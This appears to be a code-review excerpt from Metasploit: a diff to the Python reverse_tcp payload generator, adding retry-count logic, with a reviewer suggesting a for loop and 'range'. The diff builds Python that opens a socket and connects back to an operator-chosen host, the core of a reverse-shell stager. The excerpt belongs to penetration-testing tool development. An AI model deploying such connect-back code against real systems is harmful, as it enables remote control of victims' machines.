lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,21 +52,24 @@ def transport_config(opts={})
 
   def generate_reverse_tcp(opts={})
     # Set up the socket
-    cmd  = "import socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
-    if datastore['StagerRetryWait'].blank? # do not retry at all (old style)
+    cmd  = "import socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
+    cmd << "counter = 0\n"
+    if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
       cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     else
-      cmd << "while 1:\n"
+      cmd << "while counter<#{opts[:retry_count].to_i}:\n"
```

Comment:
No, just drop the counter in favor of the for loop like @timwr suggested and use `range` instead of `xrange`. You can keep the support for 0 to retry indefinitely as outlined in the example provided.